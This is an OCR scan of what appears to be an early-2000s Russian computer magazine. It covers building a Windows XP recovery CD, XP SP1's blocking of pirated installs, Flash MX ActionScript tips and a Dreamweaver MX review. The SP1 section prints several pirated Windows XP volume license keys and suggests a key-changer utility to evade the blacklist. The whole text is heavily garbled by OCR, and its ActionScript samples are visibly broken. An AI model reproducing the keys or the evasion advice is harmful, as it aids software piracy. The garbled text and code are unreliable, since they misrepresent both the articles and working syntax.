зиться с сидюка и выбрать соответствующий 
пункт в меню (кстати, и тут не обошлось без 
обидной задницы - сначала надо согласиться на 
переустановку виндов, потом отказаться и толь- 
ко потом запустить консоль :). Мрак). Второй же 
способ состоит в создании аварийного сидюка, 
на который можно положить (и точка :)) тучу 
всякой полезной дряни, которая, несомненно, 
пригодится при восстановлении системы. Дела- 
ется это не просто, зато своя персонализирован- 
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ВОССТАВШИЕ ИЗ АДА 


ная болванка по-любому лучше «супер-мульти- 
мега-загрузочных» дисков с Горбушки. Клепает- 
ся такой сидюк следующим образом: выбираем 
в проге-прожигателе тип «bootable CD»; 
скармливаем ей Image file (если нет своего, 
сливай с winfo.org); 

складываем на диск диру «i386» из дистрибу- 
тива виндов и прочие файлы по вкусу; 

в корень ОБЯЗАТЕЛЬНО кладем файлы 
CDROM_NT.5 и CDROM_IP.5 с любым co- 
держанием; 

если винды русские, кладем в корень ВООТ- 
FONT.BIN (лежит в 1386); 

если в винды интегрирован SP1/SP2, кладем в 
корень CDROM_SP.TST/CDROMSP2.TST со- 
ответственно (содержание опять-таки любое); 
поджигаем диск, не забыв закрыть сессию и 
финализировать его. 


Вот и все. Теперь, в случае чего, ты сможешь 
запустить консоль с сидюка, а в крайнем слу- 
чае и переставить винды со всеми потрохами. 


ПУНЕТ TPETHH. ФПОПОВОН 


Последний вариант состоит в создании ава- 
рийного комплекта дискет (в количестве че- 
тырех штук) при помощи утилиты makeboot 
(лежит в каталоге bootdisk лицензионного си- 
дюка с виндами). Фактически эти дискеты за- 
меняют сидюк, за исключением того, что пе- 
реустановить с них винтукей не получится ни- 
коим образом. 


IH CASE OF EMERGENCY 


Чтобы жизнь показалась реальной малиной, 
советую, помимо диска/дискет с загрузочны- 
ми свойствами, поиметь в своем хозяйстве 
одну маленькую, но очень важную фишку - 
диск аварийного восстановления. Чтобы вин- 
ды записали на дискету бэкап всех жизненно 
важных файлов и настроек, надо запустить 
Архивацию данных (Программы - Служеб- 
ные) и из меню «Сервис» выбрать пункт «Со- 
здание аварийного диска». По желанию кли- 
ента туда же бэкапится реестр. Воспользо- 
ваться аварийным флопиком ты сможешь 
при загрузке с диска/дискет, для этого нужно 
только клацнуть по соответствующему пунк- 
Ту в загрузочном меню. 


REPAIRED SUCCESSFULLY 


Если тебе повезет (a тебе обяза- 
тельно повезет, я знаю :)), то по- 
сле методичного перебора всех ти- 
пов восстановительных работ твой 
винтукей снова станет бодрым и 
жизнерадостным. Так что ВО 
храняйся и сохраняйся. Alt-F4 = 
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Alexys (alexys@winfo.org, http://www.winfo.org) 


На момент подготовки статьи к печати по- 
следним был WinXP Build 2600 (Service Pack 
1, v.1097). Народ сразу поломился ero ста- 
вить, даже не разобравшись, что к чему и для 
чего в нем. И обломался! Не ставится он так 
просто на распространенные у нас винды (пи- 
ратские, понятное дело :)), выдавая ошибку о 
неправильном серийнике. «Какого?» - спро- 
сишь ты. Да просто парни из MS решили не- 
много усложнить жизнь юзерам пиратских 
ХРишек. Читай внимательнее, в каких случа- 
ях такое происходит, и решай, насколько ну- 
жен тебе этот апдейт. 


В сервиспаке к ХР имеются все исправления 
уже известных ошибок и реализованы неко- 
торые новые функции (поддержка специфи- 
кации USB 2.0, a также технологий Freestyle, 
Mira и Tablet PC). По заверению создателей, 
90% всех найденных ошибок было вызвано 
не виндами, а получено в результате исполь- 
зования нескольких сторонних программ. SP1 
должен решить если не все подобные про- 
блемы, то, по крайней мере, большинство. 

Данный сервиспак включает в себя все пат- 
чи, закрывающие явные щели в системе бе- 
зопасности (правда, ребята из Микрософта и 
раньше заявляли об устранении АБСОЛЮТ- 
НО ВСЕХ дырок, вот только новые все равно 
находились). В SP1 Windows Messenger будет 
обновлен до версии 4.7, причем устранена 
старая проблема, когда после запуска 
Messenger продолжал работать в фоновом 
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режиме. Также приятно, что убрана настоя- 
тельная рекомендация об использовании пас- 
порта Microsoft Passport при обращении к 
\\еб-службам (например, MSN, Hotmail). Ho 
это все мелочи. Наконец-то мелкомягкие сде- 
лали первый шаг к тому, чтобы перестать 
быть заклятыми буржуям-монополистами! 
Для апплета «Установка и удаление про- 
грамм» (Add or Remove Programs) выпущен 
дополнительный модуль - специальная надст- 
ройка, которая позволит скрыть (но не уда- 
лить из системы, как тебе хотелось бы) все, 
что вызвало гнев и ярость Министерства юс- 
тиции США (Internet Explorer (IE), Outlook 
Express, Windows Media Player (WMP), 
Windows Messenger и Java Virtual Machine 


рис. Людмила Стеблянко 


(VM)). Доступен этот элемент будет через ме- 
ню «Пуск», в котором появится значок 
Compliance Change. Сделанное майкрософ- 
товцами - лишь капля в море, ибо все это 
можно было устроить и самому, немного по- 
копавшись в реестре. При удачном вмеша- 
тельстве можно было удалить весь вышепе- 
речисленный софт подручными средствами 
(таки было сделано у меня на старом компе - 


Ыктоссй © Wwiincicuss 


Weersior 5.1 [Вы 2500 х 
[ Ари gr 2 УВ: 


с дистрибутивом виндов был из серии пират- 
ской продукции, то тут не жди легкой жизни. 
По своим каналам ребята в Microsoft’e проню- 
хали, что порядка 90% пиратских версий 
WinXP используют украденные корпоратив- 
ные ключи лицензирования (single volume 
license key), и запретили установку сервиспа- 
ка на такие винды. На ХР с серийником из ми- 
крософтовского блэк-листа отныне нельзя 
поставить ни одно обновление. Попытка это- 
го ограничения, используя Windows Update, 
также ни к чему хорошему не приводит. За- 
прещенный серийник #1 в России - FOKGW- 
RHQQ2-YXRKT-8TG6W-2B7Q8 (ХР oT 
DevilsOwn). Немного реже встречающиеся, 
HO тоже известные номера 2КТС\\-К76ЗХ- 
3PVMB-FJ7KG-9KCYK, FH3MW-BP7TR- 
JRDQF-TCMH2-4YD9F и YMC8V-BFX4W- 
WGTPJ-8H8VR-YPRTC. 

Можно, конечно, попробовать деактивиро- 
вать ключик твоих виндов при помощи хак- 
утилитки Windows XP CD-Key Changer, Ho Tor- 
да тебе понадобится ввести новый, который 
не содержится в черном списке (или купить 
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прим. Дронича). Так что данное обновление - 
лишь небольшой жест порядочности мелко- 
мягких, не более. Обидно, что апдейт не сно- 
сит софтину и ее 9!-ки, а просто прячет их и 
не освободит тебе ни одного метра на винте. 
Так что особенного тут ничего нету, ибо сме- 
нить ИЕ на оперу или аутлук на the bat по 
умолчанию и так не проблема. 

Как и в случае с ХР’шным офисом, без уста- 
новки SP1 на ХР не видать тебе больше уста- 
новленных исправлений и пополнений систе- 
мы, ибо они просто не встанут. После инстал- 
ляции SP1 будет необходимо провести по- 
вторную активацию продукта. В SP1 реализо- 
ваны две важные для дальнейшего обеспе- 
чения безопасности системы возможности - 
возможность шифровать Volume Licensing 
Кеу и добавление серийного номера в 
Jnstallation ID при каждом прохождении про- 
цедуры активации ОС (по идее, это должно 
будет снизить риск кражи номеров и повы- 
вить общую защищенность системы против 
ее пиратского использования). Еще одна при- 
“ятная новость касается особенно тех, кто ча- 
сто тестирует разные девайсы, меняя при 
этом конфигурацию компа или просто ап- 
грейдя систему. Повторную активацию отны- 
не можно будет производить не сразу при за- 
грузке, а в течение трех дней после засовы- 
вания новой железки. 

Решился на установку? Не торопись радо- 
ваться мысли, что все пройдет легко и глад- 
ко, как обычно. 


Если у тебя стоит лицензионный ХР’шник (в 
чем я сомневаюсь), то инсталляция сервиспа- 
ка пройдет безболезненно - соглашайся со 
всеми условиями и жми кнопку далее, «отки- 
нувшись на спинку кресла», а после копиро- 
вания файлов будет ребут. Но если твой диск 


лицензию). Хочешь извращений - вперед, но 
смотри, как бы потом не пришлось формати- 
ровать винт и всю систему ставить с нуля. 
Даже не имея возможности апдейтить вин- 
ды, ты сможешь работать под ними. Просто 
все останется так же, как и было. 
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ПЕРВЫЕ ВПЕЧАТЛЕНИЯ 


По прошествии более чем полгода активного ос- 
ваивания флэша версии МХ можно говорить о 
том, удался ли сей продукт и стоит ли его пользо- 
вать. И как. И счем его едят. 

Флэш плеер версии МХ уже установлен у боль- 
шинства пользователей. Вот цифры наличия пла- 
гина по данным анализа более чем у 18 тысяч 
пользователей сети. 


Flash МХ 52.18% 
Flash 5 35.93% 
Flash 4 6.87% 
Flash 3 5.42% 


Выводы делай cam 
Если ты особо одаренный флэш-программер, от- 
лично обходишься четвертой версией и творишь 
чудеса изобретательности для создания очеред- 
ного прелодера, обрадую: в МХ пятерочные баги, 
главным из которых были нехилые тормоза (пя 
терка работает значительно медленней четверки 
шестерки), в основном пофиксены. 

Скрипт стал быстрее, ООГ’истей (ООП - объея 
но ориентированное программирование), заме 
но поприбавил в количестве функций и объектов. 
Впрочем, и без потерь не обошлось: почему-то 
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ИНСТРУМЕНТ 
КРЕАТИВЩИКА 


мой любимый XMLnode, объект во флеше, соот- 
ветствующий узлу XML, оказался в deprecated, то 
есть не рекомендуемым к использованию, и, ско- 
рее всего, не будет поддерживаться в слелую- 
щих версиях. Но я все же не теряю надежды на 
его чудесное исцеление. 


РУЛЬНЫЕ ОБЪЕКТЫ 


Не надейся, что я сейчас начну утомлять тебя 
длинными списками новых функций и объектов. 
Открой Flash МХ и сам посмотри. Ax, нету? Пора 
«магазин»! 
так, что же порадовало меня так, что после пер- 
вого открытия проги руки зачесались снести пя- 
ерку? 
Весь кодтеперь можно писать в одном кадре. Ес- 
ли раньше, например, обработчик события 
onClipEvent (enterFrame) {} можно было назначить 
олько непосредственно воткнув его на мувик, TO 
еперь это элементарно можно сделать из любо- 
го места: 


iss) 


_root.my_mc.onEnterFrame = function () {} 


при необходимости удалить или заменить: 


_root.my_ mc.onEnterFrame = function() { 
this.i++; 
if (this.i == 10) { 
this.onEnterFrame = function() { 
// здесь пишем что хотим 


} 

ip 

Идем дальше: кнопкам ты наконец-то можешь за- 
давать имена, если захочешь. Кнопки и в пятерке 
определялись как мувики циклом г... п... но до- 
ступакним не было никакого. Атеперь - пожалуй- 
ста. Кнопка имеет свойства мувика. Или скорее 
так: мувику можно задавать свойства и поведе- 
ние кнопки. 


Но, конечно, самые большие изменения претер- 
пело текстовое поле. Убогое и неюзабельное 
екстовое поле расивело пышным цветом изме- 
няемых свойств. И из серой мышки превратилось 
в объект с самым большим количеством свойств. 
Но на этом не остановились решительные разра- 
ботчики из Макромедии. Разойдясь не на шутку, 
они сделали еще и объект TextFormat, который 
предоставляет дополнительные возможности уп- 
равления форматированием текста. 
А коротким предложением ют атау 
=TextField.getFontList() мы можем получить массив 
OHTOB на компе юзверя. И пользовать оные, не 
инклудя почем зря лишние килобайты. Килобайты 
не бывают лишними (откуда это?). 
Но если попытаться скриптом подключить шар- 
ные фонты... Хоть это и возможно, но процедура 
настолько сурова, что в реальной жизни никто 
этого не пользует. 
Я надеялся, что появится объект Library в МХ и ре- 
шение таких вопросов станет простым, но, увы... 
остается ждать и надеяться на следующую версию. 


В ОЖИДАНИИ 3D 


Впрочем, это не единственное, что хотелось бы 
видеть, но не случилось, например: _xskew, 
_yskew, _xperspective, _yperspective - эти слова за- 
ставляют чаще биться серлце как у начинающих, 
так и у зубров. Динамическое задание скоса и 
перспективы до сих пор отнимает массу усилий у 
разработчиков. Как только появятся эти свойства 
мувиков, программирование трехмерностей во 
флэше качественно изменится. 


РИСУЕМ ПРОГРАММНО 


Но 


Мечего грустить по поводу несостоявшихся 


свойств. Давай возрадуемся тому, что появилось 
и существенно изменило процесс разработки в 
лучшую сторону. 
Например, программное рисование. Первые же 
в руках разработчиков по- 


опыты показали, что 


м 


явился новый мощный инструмент. При всей его 
простоте он перевернул подходы к разработке 
многих вещей. 
По-прежнему, если нужно, чтобы вышла рожица 
кривая, удобнее использовать метод точка-точ- 
ка-запятая, a He теТо-теТо-сигуеТо. Но если мы 
захотим, например, поместить процедуру дина- 
мического создания скроллбара в прототиптекс- 
тового поля, не прибегая к использованию му- 
виклипов из библиотеки, то без программного 
рисования не обойтись. 


ли еслиты заглядывал KO мне на домашнюю стра- 
ничку, то мог видеть в уроках рассказ о том, как 
сделать собственную пипетку цвета (color dropper), 
спользуя ред в качестве основы. Теперь благода- 
ря инструментам рисования достаточно взять в 
разделе «experiments» готовый скрипт, воткнуть 
где-нибудь в первом кадре и потом в любом месте 
проекта, вызвав функцию, получить в нужном месте 
готовую палитру нужного размера. 
Вообще, чем больше развивается Action Script, 
тем меньше ходят на FlashKit, а больше на сайты 
ипа Layer51. Все удобнее становится пользо- 
ваться прототипными функциями, не задумыва- 
ясь об их содержании, чем разбираться в иерар- 
хии и принципах построения чужого исходника. 


еняются рыбные места, за ними мигрируют 
разработчики. 
СОБСТВЕННЫЕ СВОЙСТА 


РАЗ И НАВСЕГДА 


ще один очень важный момент: в МХ появилась 
возможность создавать собственные свойства! 
Давай этот момент рассмотрим на примерчике. 
Делаем чекбокс: 
Нарисуй квадрат с заливкой белым. Слоем выше 
галочку. Галочку волшебным заклинанием F8 
преврати в мувик и экземпляру этого мувика на- 
пиши имя, например: yes_mc. Не советую писать 
другое, чтобы не запутаться. 

Выдели квадратик и галочку и преврати в мувик. 
Перерыв начай. После перерыва в первом кадре 
нашего чекбокса пишем: 


this.valueSet = function() {this.value = 
this.yes_mc._visible = arguments[0];}; 
this.valueGet = function() {return this.value;}; 
this.addProperty(«value», valueGet, valueSet); 
this.onRelease = function() {this.value = 
'this.value;}- 

this.value = false; 

Должно работать Ha клик. Если He работает, зна- 
чит, тыеше не поставил себе версию МХ или сде- 
лал что-нибудь не так. A если работает, то давай 
разберемся, как: 
- вначале задали две функции valueSet u valueGet; 
в valueSet мы присваиваем значение аргумента 
переменной value и свойству ме галочки; 

- в valueGet просто возвращаем значение пере- 
енной value; 
после этого добавили свойство нашему мувик- 
ипу функцией addProperty. В аргументах функ- 
ции первый аргумент в кавычках - имя свойства, 
оторое создаем, далее имена функций, которые 
ужно вызывать в случае задания этого свойства 
в случае его запроса. 


= 


zw 


Вроде с виду громоздко. Но написав однажды 
собственное свойство и в дальнейшем исполь- 
зуя его, как и обычное встроенное свойство, го- 
раздо легче использовать и понимать взаимо- 
действие объектов в больших проектах. 


КОНТАЧИТЬ С МУВИКАМИ 
СТАЛО ЛЕГЧЕ! 


Ты помнишь, сколько чудных мгновений достав- 
ляла задача организации взаимодействия двух 
роликов. Эти чудные мгновения превращались в 
часы, если требовалось передать разные данные 
з разных объектов независимо друг от друга. А 
все из-за того, что исполнялась только послед- 
няя 5 команда в кадре, остальные гибли, как 
здравые мысли с утра после вчерашнего. 

В МХ такая задача решается на раз при помощи 
объекта LocalConnection. При его помощи можно 
наладить взаимодействие между разными роли- 
ками в проекте. И что особо порадовало, 
LocalConnection работает без проблем незави- 
симо от расположения принимающего ролика: 
он может находиться и в другом фрейме, и даже 
в другом окне браузера. 
Но в хелпе нет описания LocalConnection. Kak не- 


редко случается у Макромедии, сделать-то они 


сделали, а в официальные документы включить не 
успели. Так что описание ищи у них на сайте по 
ключевым словам «LocalConnection». Ниже я про- 
комментирую их пример: 

Для организации взаимодействия в ролике-от- 
правителе создается объект-отправитель, на- 
пример, на нажатие кнопки: 
my_button.onRelease = function() { 

// создаем объект: 

out_lc = new LocalConnection(). 

// и затем оправляем: 

out_Ic.send(«lc_name», «methodToExecute», 
userMessage.text); 


. 
ui 


Здесь заслуживают интереса параметры функ- 
ции send. 
- «С пате» - уникальный идентификатор соеди- 
нения. Соединение с таким именем может быть 
ОЛЬКО ОДНО. 
- «methodToExecute» - имя функции, которая бу- 
дет вызвана в ролике-получателе. 
- userMessage.text - аргумент, с которым будет 
вызвана функция methodToExecute. 


В ролике-получателе создается объект-получа- 
ель, функция обработки получаемой информа- 
ции и открывается соединение: 

incoming_lc = new LocalConnection(); 
incoming_lc.methodToExecute = function(param) { 
sentMessage.text = param; 

} 


incoming_lc.connect(«lc_name»); 


HA ЛЕТУ 


A вот еще новая фишка function.apply(), смотрим 
примеры: 


_Troot.createEmptyMovieClip(«my_mc», 1) 
function function1() {trace(this + « function 
function1 called, argument: «+arguments[0]);} 


function function2() {trace(«function function2 
called, argument: «+arguments[0]);} 

function function3() {trace(«function function3 
called, argument: «+arguments[0]);} 

for (i=1; i<=3; i++) 
{this[«function»+i].apply(this, [i]);} 

this. function1.apply(this.my_mc, [this.my_mc]) 
Этот пример демонстрирует возможность вызо- 
ва функции по динамически заданному имени. А 
последней строкой этого примера вызывается 
функция Типсйоп1 из объекта, в котором ее нет! С 
виду арру - простенькая вещь, а насколько при- 
ятней делает жизнь! А в некоторых случаях про- 
сто незаменима. 
В этом примере рисуем квадраты разного цвета, 
используя только одну функцию для рисования. 
function drawSquare() { 
this.beginFill(arguments[0], 100); 
this.lineTo(10, 0), this.lineTo(10, 10), 
this.lineTo(0, 10), this.lineTo(0, 0); 
this.endFill(); 


for (1=1; 1<=10; i++) { 
drawSquare.apply(mc=this.createEmptyMovieClip 
(«my_mc»»+i, i), [i*i*OxOOFFFF]); 
тс. х=1*11; 
} 

СЧИТАЕМ БАЙТЫ 


Также ты порадуешьсятому, что в МХ на закачкупе- 
ременных и хп! можно повесить прелодер. Это по- 
тому, что появились соответствующие функции для 
этого - getBytesTotal и getBytesLoaded. Остальная 
процелура обработки такая же, как и у мувика. 


ПРИСЛУШИВАЕМСЯ 


Вспомни, как извращался народ в предыдущих 
версиях, создавая собственные листенеры (iS- 
teners). Теперь они повсюду. Любому объекту 


можно добавить листенер и слушать, слушать, 
слушать... в ожидании нужного события. 
Появился очень интересный объект System, гля- 
нем-ка, что в нем... 

for (prop in System) { 

trace(prop+» - «+System[prop]); 

for (val in System[prop]) {trace(«\t»+val+»\t= 
«+System[prop][val]); } 

} 


Hy что? Зачесались руки использовать информа- 
цию о компе юзверя? Главное, пользуй в мирных 
целях! (Ну да, ну да :)... - прим. ред.) 

И все как обычно у Макромелии. Судя no хелпу, у 
этого объекта нет функций. На поверку оказыва- 
ется - это не так. Можешь и сам попробовать: 
System.ShowSettings() 


CLOSE 


Итак, мы кратенько про 
вовведениям Action Script. 
В следующих номерах журнала разберем скрипт 
по косточкам. Ты узнаешь о недокументирован- 
ных возможностях и способах их использования. 
И это... поставь себе МХ. = 


ok 


лись по некоторым HO- 
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Арнольд Ha поле - сейчас 
извратимся! 
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ресно себя ведет. В на- 
шем случае это очень 
удобно, поскольку ав- 
томатически снимает 
несколько вопросов, 
связанных с глубиной 
размещения маски, 
именным пространст- 
вом и тому подобное. 

В общем, программ- 
но, через функцию 
установки маски ра- 
ботать с масками 
можно гораздо эф- 
фективнее. 


Чтобы сделать маску, 
сперва нужно нарисо- 
вать фигуру, которая 
будет той самой дыр- 
кой, поэтому для на- 
чала создадим функ- 
цию рисования прямо- 
угольника для маски и 
поместим ее в прото- 
тип мувиклипа (это 
такое место, откуда 
любой мувиклип будет 
ее видеть). 

Функция очень проста. 
В качестве аргументов 
мы будем передавать 
ей соответственно: 
ширину, высоту, и ко- 
ординаты х и у точки, в 
которую поместим 
верхний левый угол 
этого прямоугольника. 


MovieClip.prototype. 
drawMaskRectangle = 
function(w, h, x, y) { 

// начинаем заливку 
черным со 50% про- 
зрачностью: 
this.beginFill(O0, 50); 

// рисуем контур пря- 
моугольника: 

this. moveTo(x, у), 

this. lineTo(w+x, у), 

this line To(w+x, h+y), 
this line To(x, h+y), 

this line To(x, у); 

// заканчиваем залив- 
ку: 
this.endFill(); 

ne 

и тут же ее проверяем 
на дееспособность: 
_root.drawMaskRectan 
gle(100, 200, 10, 20) 
При тесте (Ctrl+Enter) 
должен нарисоваться 
прямоугольник разме- 
ром 100х200, верхний 
левый угол в коорди- 
натах x=10, y=20. 
После того как ты Ha- 
экспериментируешься 
с рисованием прямо- 
угольников разного 
размера, а может 
быть и цвета, мы про- 
ДОлЖиМ. 


Сносим строку про- 
верки скрипта или 
закомментируем вот 
так: 

// root. 
drawMaskRectangle 
(100, 200, 10, 20) -Ho 
лучше снести на- 
прочь! 


TIPS 10 


В предыдущем типсе 
мы затронули прото- 
типы - это очень удоб- 
ная вещь, так как поз- 
воляет один раз напи- 
сать скрипт, а потом 
юзать его много раз 
из разных мест. Так 
что используй прото- 
типы почаще. 


Маска наглядно 


TIPS 11 


Еще одна штука нам 
понадобится - функ- 
ция вычисления первой 
сверху свободной глу- 
бины. Нельзя запих- 
нуть два мувиклипа на 
одну глубину. Так что в 
нашем примере скрипт 
будет плодить целый 
слоеный пирог. Это ча- 
сто встречающаяся 
задача при добавле- 
нии нового мувика. По- 
этому и ей место в про- 
тотипе мувиклипа: 
MovieClip.prototype.get 
TopDepth = function() { 
// обходим все объек- 
ты в мувике: 

for (var mc in this) { 

// если тип объекта 
мувиклип 

if (typeof this[mc] == 
amovieclip») { 

// возвращаем его 
глубину и выходим из 
функции 

return 
this[mc].getDepth()+1; 
} 

р 


// если мы не вышли из 
функции раньше, зна- 
чит - мувиков не было 
// возвращаем 0 
return 0; 


}; 


Поскольку функция до- 
бавления эффекта нам 
нужна будет, видимо, 
не для одной фотки, то 
и ее поместим в прото- 
тип мувиклипа. Причем, 
функции абсолютно па- 
раллельны — ширина, 
длина и содержание 
мувиклипа «photo». 
Делать функцию бу- 
дем по принципу все в 
ОДНОМ. 


// помещаем в прото- 
тип мувиклипа функ- 
цию добавления эф- 
фекта 


// с аргументом step - 
шаг: 
MovieClip.prototype.add 
MaskShow = 
function(steps) { 

// this - здесь мувиклип 
с фотографией. 

// создаем пустой му- 
виклип: 
this.createEmptyMovie 
Clip(«mask_mc», 
this.getTopDepth()); 

// и назначаем его Ma- 
ской его родителю: 
this.setMask (this. mask _ 
mc); 

// передаем в мувик- 
лип маски необходи- 
мые константы. 

// количество шагов: 
this. mask_mc.steps = 
steps; 

// ширину фотки: 

this. mask_mc.w = 

this. width; 

// высоту одного эле- 
мента маски: 
this.mask_mc.h= 

this. height/steps; 

// значение покадро- 
вого приращения вы- 
соты маски: 
this.mask_mc.s = 

this. height/steps/steps; 
// затем мувиклипу ма- 
ски навешиваем на со- 
бытие входа в кадр: 
this.mask_mc.onEnterFr 
ame = function() { 


// здесь this - это му- 
виклип маски. 

// если раньше что-то 
нарисовали программ- 
но - будет очищено: 
this.clear(); 

// наращиваем счетчик: 
this.counter++; 

// в цикле прорисовы- 
ваем нужное количест- 
во прямоугольников: 


Вот что должно было по- 
лучиться у тебя в окне 
скрипта 


for (var i= 1; 
i<=this.steps; ++) { 

// если номер прямо- 
угольника равен счет- 
чику 

if (i= this.counter) { 

// то выходим из цикла 


break; 

} 

// иначе рисуем оче- 
редной прямоугольник 
this.drawMaskRectangl 
e(this.w, (this.counter- 
i)*this.s, 0, (i-1) *this.h); 
р 

// а если счетчик 
сравнялся с двойным 
количеством шагов 

if (this.steps*2 == 
this.counter) { 

// то удаляем мувик- 
лип маски (здесь this - 
это мувиклип маски!) 
// а вместе с ним уда- 
лится весь ненужный 
хлам 
this.removeMovieClip() 
} 

ts 

i: 

// тестируем: 
this.attachMovie(«photo», 
«photo_mc», 
0).addMaskShow (20); 


Вот и все. Я, конечно, 
понимаю, что остались 
вопросы, например, 
строка 


TIPS OF WEB 


this.drawMaskRectangl 
e(this.w, (this.counter- 
i)*this.s, 0, (i-1)*this.h); 
ВЫГЛЯДИТ — ДОВОЛЬНО 
громоздко и нечита- 
бельно. Но если взять 
исходную строку 

drawMaskRectangle = 
function(w, h, x, у) 

и сопоставить аргу- 
менты, затем пройтись 


по аргументам, можно 
трейсом, то обнару- 
жится, что ничего в 
том сложного нет. 


HOME TASK 

Я He делал обратный 
эффект - скрытия 
фотки. Если ты его 
сделаешь и сочтешь 
вполне удачным, 
сбрось его мне на мы- 
no dembicki@narod.ru. 
Только скрипт :). Мне 
обязательно приго- 
дится. И помни: по-на- 
стоящему твое только 
то, что ты успел отдать 
другим. 
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ВОЗМОЖНОСТИ 


Vadias (painter@gameland.ru, 
www. freehand.str.ru) 


В апреле 2002 года Macromedia выпустила 
новую версию любимого знаюццими людыми 
редактора веб-сайтов Dreamweaver MX. 
Macromedia подняла тогда ажиотаж вокруг 
всей своей серии продуктов MX, и многие 
главари известных фирм дали официальные 
ревью с традиционными хвалебными речами, 
однако в этот раз Дримвивер без купюр 
сделал значительный Luar вперед. Многие 
сайтостроители местного масигтаба, скачав 
и крякнув триальную версию, побрызгали 
изрядной порцией слюны и без сожаления 
стерли с компов предыдуцие версии. 


ОАЕАММУЕАМЕА, 
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МИКРОЛИКБЕЗ ДЛЯ 
НАЧИНАЮЩИХ 


Если кто-то не знает, о чем здесь идет речь, 
втыкайте: Dreamweaver - это профессиональ- 
ный НТМ!-редактор, в котором можно созда- 
вать сайты, отдельные страницы и веб-прило- 
жения - в общем, все, что связано с конструи- 

нием WWW. Здесь удобно написать и 
скрипт, и создать таблицу стилей, и серверные 
сценарии на языках ASP, ColdFusion, JSP и 
РНР. В нем можно одновременно мутить ди- 
зигн и детально и точно редактировать сырец. 
В последних версиях фишки для ручного ре- 
дактирования кода взяты из HomeSite, продук- 
пании Allaire, которая впоследствии про- 
Cb Макромелии, a HomeSite считался, по 
крайней мере, одним из лучших НТМ! -редакто- 
ров. Если ты разбираешься в теории и владе- 
ешь горячими клавишами Лримвивера, то лег- 
ко замутишь сложнейшие фичи, обеспечишь 


Любой свой документ ты 
можешь проверить на 
BLUUBOCTh, используя 
валидатор (File-->Check Page). 
Проверить можно на 
соответствие стандартам 


HTML, XHTML, другим 
стандартам либо 
определенному браузеру. 
Виды проверок 
устанавливаются здесь: Edit- 
>~Preferences->Validator. 


логичную структуру и легкость модификации 
проекта, а также сэкономишь кучу времени. 
Одним из главных преимуществ данного ре- 
дактора состоит в том, что даже при визуаль- 
редактировании страницы лишний код 
актически не добавляется (если умеючи ис- 
пользовать - он не добавится совсем). С по- 
ошью Дримвивера можно добавлять Ha стра- 
ницы и настраивать разного рода «медию» и 
енарии JavaScript. Они встраиваются в ин- 
терфейс редактора примерно так же, как 
льтры в Фотошоп, а нарыть их можно в не- 


лых дозах на сайте Macromedia. 
В целом же Dreamweaver МХ - почти универ- 
сальная прога, которая позволит обойтись без 

ногих побочных прог, обычно применяющихся 
при сайтостроении. Скажем, проверка право- 
писания (Spell Checking) здесь встроена, прав- 
да, для родного языка (какой он там у тебя?) 
придется скачать словарь с сайта Macromedia. 


DREAMWEAWER МХ 


Dreamweaver UltraDev. Первые были попроще и 
предназначались в основном только для клиент- 
ской стороны, то есть на нем создавались стати- 
ческие и динамические Naru, работающие на 
омпах юзеров и не использующие сторону сер- 
вера. UltraDev xe являлся, по сути, расширенной 
версией и давал возможность делать веши, кон- 
тачащие с сервером - серверные скригты и ра- 
бота с базами данных. Dreamweaver МХ объеди- 
нил возможности DW 4 с Dreamweaver Ultradev. 
3 этого следует, что он подходит ANA создате- 
лей веба любого уровня - от слабошарящего в 
зысках болышого кодинга веб-дизайнера ло 
бородатых программеров с ожерельем из мик- 
росхем на шее, которым глубоко параллельна 
тонкость графической композиции. Так что «не- 
грамотным» в плане программинга людям бо- 
яться сложностей с интерфейсом не стоит, спе- 
цы по GUI постарались на славу. Dreamweaver 
Х фактически заменил еще один продукт 
acromedia - ColdFusion Studio, который служил 
для разработки приложений на серверном язы- 
е ColdFusion. Эту штуку очень хвалят как про- 
стое и мощное средство, и сам я в ближайшее 
время лумаю вплотную им заняться, так что жди 
соответствующих материалов ;). 
Большой плюс всех этих прелестей интегриро- 
вания - это то, что команде создателей сайта - 


здается закрывающий тег, если он необходим. 
Все это поможет избавиться от большинства 
ошибок, совершаемых по забывчивости ил 
невнимательности, а также сохранит кучу вре- 
мени и нервов. Эта фича, а также цветовая 
синтексная подсветка поддерживаются для 
HTML, XHTML, XML, ASP, ASP.NET, JSP, PHP, 
ColdFusion (то есть дофига). 
Очень жаль, что такая замечательная вещь, как 
содержимое панели Reference, не переведено 
на русский язык. Здесь собраны справочник 
по таким темам, как СЕМИ, CSS, HTML, 
JavaScript, ASP и другим. Они весьма и весьма 
полезны в работе, поэтому каждый раз прихо- 
дится вспоминать английский или биться баш- 
кой в словарь. 


ПОДДЕРЖКА ВСЕГО ПОДРЯД 
И ОСТАЛЬНОЕ 


Стоит ли говорить, что практически все совре- 
менные интернет-технологии, такие как Flash, 
Fireworks, уЧама-апплеты, Activex и другие, запро- 
сто Огад’ются-п-Огор’паются в поле окна редак- 
тора. Кстати, Назй-кнопки можно создавать пря- 
мо на месте, у Дримвивера в наличии имеется 
несколько десятков шаблонов для таких кнопок, 
от тебя требуется только ввести текст и залать 
другие параметры кнопки. Разумеется, с их сай- 
та можно скачать и другие шаблоны. Также мож- 
о создавать и flash-TeKCT, это делается в тех 
случаях, когла приспичило применить на стра- 
нице какой-либо нестанлартный шрифт. 
Заметно улучшилась поддержка CSS. Добави- 
лись новые конструкции стандарта CSS 2, и 
работать со стилями вполне удобно. 
Не могу молчать о встроенных продвинутых шаб- 
лонах (templates)! Эти замечательные илуки дают 
возможность контролировать внешний вид, всех 
страниц сайта (хочешь поменять одну букву в 
Janke Nar - меняешь шаблон, и все страницы, 
созданные по этому шаблону, изменятся автома- 
том). Одни шаблоны можно вставлять в другие. 

Улучшилась работа с таблицами, а это, как ты 
знаешь, весьма важная часть - вель болышин- 


Автоматически можно создать фотоальбом для 
веб командой Commands->Create Photo Album 
(раньше это делали другие проги, в основном 
графические редакторы). Если паришься и не 
можешь подобрать подхоляшие и не противо- 
речащие друг другу цвета, то можешь восполь- 
зоваться предложенными цветовыми схемами 
(Commands->Set Color Scheme). Здесь для 
каждого цвета бэкграунда несколько вариантов 
гармоничных расцветок текста. 


дизайнерам и программерам - станет легче ра- 
ботать вместе, в одной среде, перекидывая 
друг другу свои исходники. Не забывай и о та- 
кой фиче, как Design Notes, которые позволяют 
оставлять памятные метки для файлов или для 
отдельных элементов, чтобы их ненароком не 
попортили или не затерли :). 
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Триальная версия доступна для скачивания по 
этому адресу: 
htto://www.macromedia.com/software/trial_ down 
load/index.cgi/. Версия для Windows Becut Te- 
перь 48,8 мегов. Заметно разжирела, Hy да не 
